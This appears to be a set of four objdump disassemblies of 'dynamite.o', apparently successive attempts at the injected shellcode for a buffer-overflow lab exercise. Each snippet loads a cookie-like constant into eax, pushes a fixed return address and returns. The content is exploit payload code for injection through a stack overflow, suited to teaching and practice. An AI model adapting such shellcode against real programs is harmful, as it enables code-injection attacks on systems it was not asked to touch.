
dynamite.o:     file format elf32-i386


Disassembly of section .text:

00000000 <.text>:
   0:	a1 6d 20 44 6a       	mov    0x6a44206d,%eax
   5:	ff 35 be 8c 04 08    	pushl  0x8048cbe
   b:	c3                   	ret    

dynamite.o:     file format elf32-i386


Disassembly of section .text:

00000000 <.text>:
   0:	c7 00 6d 20 44 6a    	movl   $0x6a44206d,(%eax)
   6:	68 be 8c 04 08       	push   $0x8048cbe
   b:	c3                   	ret    

dynamite.o:     file format elf32-i386


Disassembly of section .text:

00000000 <.text>:
   0:	b8 6d 20 44 6a       	mov    $0x6a44206d,%eax
   5:	68 be 8c 04 08       	push   $0x8048cbe
   a:	c3                   	ret    
   b:	90                   	nop

dynamite.o:     file format elf32-i386


Disassembly of section .text:

00000000 <.text>:
   0:	b8 6d 20 44 6a       	mov    $0x6a44206d,%eax
   5:	68 35 8d 04 08       	push   $0x8048d35
   a:	c3                   	ret    
   b:	90                   	nop
